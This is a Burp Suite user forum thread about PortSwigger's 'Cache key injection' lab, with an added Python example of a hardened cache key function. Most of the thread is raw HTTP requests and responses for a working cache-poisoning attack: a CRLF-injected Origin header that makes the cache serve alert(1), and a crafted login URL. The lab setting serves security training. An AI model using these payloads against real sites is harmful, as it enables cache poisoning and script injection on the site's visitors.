Burp Suite User Forum


Lab: Cache key injection

Cyber | Last updated: Jun 01, 2023 12:55PM UTC

Hi, I can't solve the lab. I am sending the following requests.

----- 1. -----

First request (please note that the Origin header has been added 2 times):

GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$
Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net
Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Pragma: x-get-cache-key
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

First response without duplicate Origin header:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Vary: Origin
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=35
Age: 0
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$
X-Cache: miss
Connection: close
Content-Length: 42

document.cookie = 'lang=en?utm_content=z';

First response with duplicate Origin header:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Access-Control-Allow-Origin: x
Cache-Control: max-age=35
Age: 2
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$
X-Cache: hit
Connection: close
Content-Length: 8

alert(1)

----- 2. -----

Second request:

GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/1.1
Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net
Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Referer: https://0afb003503bf820180b02bda008800cd.web-security-academy.net/login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent%2DLength:%208%250d%250a%250d%250aalert(1)$$%23

Second response:

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 16

"Protocol error"

HTTP is downgraded to 1.1. Thanks.
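An added example, not from this thread or from PortSwigger's lab code: a toy cache that builds keys shaped like the X-Cache-Key values quoted above, once in the weak form that copies the raw Origin value into the key, and once hardened so that a percent-encoded CR/LF (or anything that is not a plain web origin) is refused before it can reach the key. The function names, the unkeyed-parameter list and the exact key grammar are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Hypothetical cache policy (assumption): utm_content is excluded from the key,
# and the Origin header becomes part of the key only when cors=1 is requested.
UNKEYED_PARAMS = {"utm_content"}

# A serialized web origin is scheme://host[:port] and nothing else. One
# allow-list check rejects CR, LF, '%', ':' followed by a header name, etc.
ORIGIN_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d{1,5})?")


def split_query(query):
    """Toy parser: this cache treats both '?' and '&' as parameter separators."""
    return [p for p in re.split(r"[?&]", query) if p]


def keyed_query(query):
    """Return the query string with the unkeyed parameters removed."""
    kept = [p for p in split_query(query) if p.split("=", 1)[0] not in UNKEYED_PARAMS]
    return "&".join(kept)


def weak_cache_key(path, query, headers):
    """Weak form: the raw Origin value is appended to the key verbatim, so an
    encoded CR/LF survives into whatever later decodes or echoes the key."""
    key = f"{path}?{keyed_query(query)}$$"
    if "cors=1" in split_query(query) and "Origin" in headers:
        key += "Origin=" + headers["Origin"]
    return key


def safe_cache_key(path, query, headers):
    """Hardened form: decode exactly once, then allow-list the value as a web
    origin. Returns None when the request must neither be served from nor
    stored in the cache (the front end should answer 400 instead)."""
    key = f"{path}?{keyed_query(query)}$$"
    if "cors=1" in split_query(query) and "Origin" in headers:
        origin = unquote(headers["Origin"])
        # Rejects "x%0d%0a...", the double-encoded "%250d" variant (still
        # contains '%' after one decode) and bare hostnames without a scheme.
        if not ORIGIN_RE.fullmatch(origin):
            return None
        key += "Origin=" + origin
    return key


if __name__ == "__main__":
    # Constructed input: the Origin value from the thread's first request.
    hostile = {"Origin": "x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$"}
    print(weak_cache_key("/js/localize.js", "lang=en?utm_content=z&cors=1&x=1", hostile))
    print(safe_cache_key("/js/localize.js", "lang=en?utm_content=z&cors=1&x=1", hostile))  # None
```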

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 10:04AM UTC

Hi, Is there a reason for duplicating the Origin header in the first request and duplicating the utm_content in the second?

If it helps, I was able to solve the lab using the following two requests:
https://snipboard.io/vEPUB3.jpg
https://snipboard.io/QZwI8A.jpg

Does the following video walkthrough help at all?
https://www.youtube.com/watch?v=fU65sWuZPyc

Cyber | Last updated: Jun 05, 2023 09:01AM UTC

Hi Ben, I noticed that the double Origin header in the first request is not needed if the dash in the Origin header value is removed (between "Content" and "Length").

--- 1 ---
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$
returns this:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Vary: Origin
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=35
Age: 1
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$
X-Cache: hit
Connection: close
Content-Length: 42

document.cookie = 'lang=en?utm_content=z';
---------

--- 2 ---
Origin: x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$
returns this:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Access-Control-Allow-Origin: x
Cache-Control: max-age=35
Age: 0
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$
X-Cache: miss
Connection: close
Content-Length: 8

alert(1)
---------

Maybe there is a problem with the encoding. I tried the suggested video (https://www.youtube.com/watch?v=fU65sWuZPyc) but without much success.

Ben, PortSwigger Agent | Last updated: Jun 05, 2023 05:10PM UTC

Hi, Did you take a look at the screenshots of the example requests that I used to solve the lab? The lab appears to work as expected in line with the written solution.

Cyber | Last updated: Jun 07, 2023 08:12AM UTC

Hi, I studied the screenshots you sent but I was not able to see the differences compared to my requests. I sent requests using Postman and completed the lab.

Burp:
https://snipboard.io/vEY8uC.jpg
https://snipboard.io/H0Jcr9.jpg

Postman:
https://snipboard.io/gcSE7b.jpg
https://snipboard.io/7Ceznd.jpg
